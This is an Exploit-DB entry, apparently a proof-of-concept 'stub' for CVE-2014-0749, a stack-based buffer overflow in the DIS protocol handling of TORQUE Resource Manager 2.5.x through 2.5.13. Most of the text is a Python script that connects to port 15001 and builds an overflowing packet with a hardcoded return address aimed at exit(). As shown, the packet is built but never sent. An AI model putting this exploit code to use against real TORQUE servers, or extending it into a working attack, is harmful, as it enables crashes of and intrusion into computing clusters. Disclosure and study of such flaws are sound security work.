TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub

ID EDB-ID:33554
Type exploitdb
Reporter bwall
Modified 2014-05-28T00:00:00


TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub. CVE-2014-0749. Remote exploit for linux platform

                                            #!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
# Date: 27 May 2014
# Exploit Author: bwall - @botnet_hunter
# Vulnerability discovered by: MWR Labs
# CVE: CVE-2014-0749
# Vendor Homepage:
# Software Link:
# Version: 2.5.13
# Tested on: Manjaro x64
# Description:
# A buffer overflow while parsing the DIS network communication protocol.  It is triggered when requesting that
# a larger amount of data than the small buffer be read.  The first digit supplied is the number of digits in the
# data, the next digits are the actual size of the buffer.
# This is an exploit stub, meant to be a quick proof of concept.  This was built and tested for a 64 bit system
# with ASLR disabled.  Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
# compiled on the target system.  The result of this exploit is intended to just point RIP at 'exit()'

import socket

ip = ""
port = 15001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))

offset = 143
header = str(len(str(offset))) + str(offset) + '1'

packet = header
packet += "\x00" * (140 - len(packet))
packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build

data = s.recv(1024)